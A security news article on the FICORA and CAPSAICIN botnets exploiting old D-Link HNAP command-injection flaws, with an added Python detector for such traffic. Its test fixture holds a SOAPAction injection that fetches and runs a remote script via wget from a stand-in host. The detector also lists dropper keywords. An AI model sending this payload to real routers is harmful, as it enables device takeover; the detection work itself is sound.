
FICORA and CAPSAICIN botnets take advantage of old D-Link router vulnerabilities for DDoS attacks


FortiGuard Labs, Fortinet's threat research team, reported a surge in botnet activity in October and November 2024 driven by two newly named threats, "FICORA" and "CAPSAICIN". FICORA is a variant of the Mirai botnet and CAPSAICIN a variant of Kaiten; both can execute arbitrary commands on an infected device and recruit it into large-scale denial-of-service attacks.

Both botnets spread primarily by exploiting long-known vulnerabilities in D-Link routers, including CVE-2015-2051, CVE-2019-10891, CVE-2022-37056, and CVE-2024-33112. All of these are command-injection flaws reachable through the routers' HNAP (Home Network Administration Protocol) management interface: an unauthenticated remote attacker who can reach the interface gets the device to run shell commands of the attacker's choosing. Fixes for the older entries in this list have been available for years, yet attackers have been using these weaknesses for almost a decade to deliver malware, because large numbers of units remain unpatched.

FICORA is built for multiple Linux architectures and uses the ChaCha20 cipher to encrypt its configuration. Its functions include brute-forcing credentials, killing competing malware processes on the device, and launching DDoS attacks over several protocols. CAPSAICIN, whose activity concentrates on East Asian countries, has a similar feature set: it downloads follow-on scripts, connects to its command-and-control servers, and carries out DDoS attacks.

Although these vulnerabilities have been public for years, the volume of attacks that still exploit them remains a serious concern. To keep D-Link devices out of these botnets, apply firmware updates promptly, keep the HNAP management interface off the WAN side, and monitor traffic to the routers' management ports. Devices kept current and watched closely are far less likely to be exploited, and the monitoring also reveals attempts against devices that are already patched.
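The HNAP bugs named above are all command injections carried in an HNAP request, so the "network monitoring" the article recommends can be made concrete. The following is an added example, not code from FortiGuard Labs or from the article: a small Python checker that parses a raw HTTP request and flags the obvious signs of HNAP abuse (a SOAPAction header that is not a plain HNAP action URI, shell metacharacters, download commands). The two HNAP requests it is run against are constructed for this example and use documentation IP ranges; the thresholds and word lists are this example's own assumptions, not a published signature.

```python
"""Added example: flag HTTP requests that abuse a D-Link router's HNAP interface.

This is illustrative detection logic, not FortiGuard Labs' code. The legitimate
SOAPAction shape and the list of dropper words are assumptions made for this
example; a real deployment would tune them against the traffic it sees.
"""
import re

# A legitimate HNAP SOAPAction is exactly the namespace plus an action name
# (assumption for this example, based on how HNAP requests are normally formed).
HNAP_ACTION = re.compile(r'^"?http://purenetworks\.com/HNAP1/[A-Za-z0-9]+"?$')

# Characters that have no business inside a SOAPAction header value.
SHELL_META = re.compile(r"[`;|&$()<>]")

# The SOAP body is XML, so '<', '>' and '&' are normal there; only look for
# command separators and substitution inside it.
BODY_META = re.compile(r"[`;|]|\$\(|&&")

# Words typical of a one-line dropper (assumed list for this example).
DROPPER_WORDS = re.compile(r"\b(?:wget|curl|tftp|ftpget|chmod)\b|/tmp\b", re.IGNORECASE)


def parse_request(raw: str):
    """Split a raw HTTP/1.x request into (method, path, headers, body).

    Header names are lower-cased so lookups are case-insensitive.
    """
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def inspect_request(raw: str) -> list[str]:
    """Return the reasons a request looks like HNAP command injection.

    An empty list means nothing suspicious was seen. Requests that are not
    aimed at /HNAP1 are ignored, so the check can run over all traffic to the
    router's management port.
    """
    method, path, headers, body = parse_request(raw)
    reasons: list[str] = []
    if not path.upper().startswith("/HNAP1"):
        return reasons
    action = headers.get("soapaction", "")
    if action and not HNAP_ACTION.match(action):
        reasons.append("SOAPAction is not a plain HNAP action URI")
    if SHELL_META.search(action):
        reasons.append("shell metacharacters in SOAPAction")
    if DROPPER_WORDS.search(action) or DROPPER_WORDS.search(body):
        reasons.append("download/chmod command in HNAP request")
    if method == "POST" and BODY_META.search(body):
        reasons.append("shell metacharacters in HNAP body")
    return reasons


# Constructed sample requests (not captured traffic). 192.0.2.1 and
# 198.51.100.7 are documentation addresses.
BENIGN_HNAP = (
    "POST /HNAP1/ HTTP/1.1\r\n"
    "Host: 192.0.2.1\r\n"
    'SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings"\r\n'
    "Content-Type: text/xml; charset=utf-8\r\n"
    "\r\n"
    '<?xml version="1.0" encoding="utf-8"?>'
    '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">'
    '<soap:Body><GetDeviceSettings xmlns="http://purenetworks.com/HNAP1/"/>'
    "</soap:Body></soap:Envelope>"
)

INJECTED_HNAP = (
    "POST /HNAP1/ HTTP/1.1\r\n"
    "Host: 192.0.2.1\r\n"
    'SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings/'
    "`cd /tmp; wget http://198.51.100.7/x.sh; sh x.sh`\"\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

NOT_HNAP = "GET /index.html HTTP/1.1\r\nHost: 192.0.2.1\r\n\r\n"


if __name__ == "__main__":
    for label, sample in [("benign", BENIGN_HNAP),
                          ("injected", INJECTED_HNAP),
                          ("not hnap", NOT_HNAP)]:
        print(f"{label:9s} -> {inspect_request(sample) or 'clean'}")
```

Run as a script, the benign request and the non-HNAP request come back clean and the injected one is flagged three times (malformed SOAPAction, shell metacharacters, dropper command). A hit from a patched router still matters: it shows who is scanning for these bugs on your network. Signature checks like this are a stopgap for spotting attempts, not a substitute for the firmware update that removes the injection.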

Vincent Li, a researcher at FortiGuard Labs, emphasized the importance of addressing these vulnerabilities promptly to safeguard enterprise networks. He highlighted the critical need for regular device kernel updates and comprehensive monitoring to defend against evolving threats like the FICORA and CAPSAICIN botnets. The proactive approach to cybersecurity hygiene is essential in combating the increasing sophistication of botnet attacks and ensuring the resilience of network infrastructure.

The emergence of FICORA and CAPSAICIN shows that decade-old router bugs remain a live threat as long as unpatched devices stay reachable. Regular updates, monitoring of management interfaces, and use of published threat intelligence remain the practical defences against botnets of this kind.
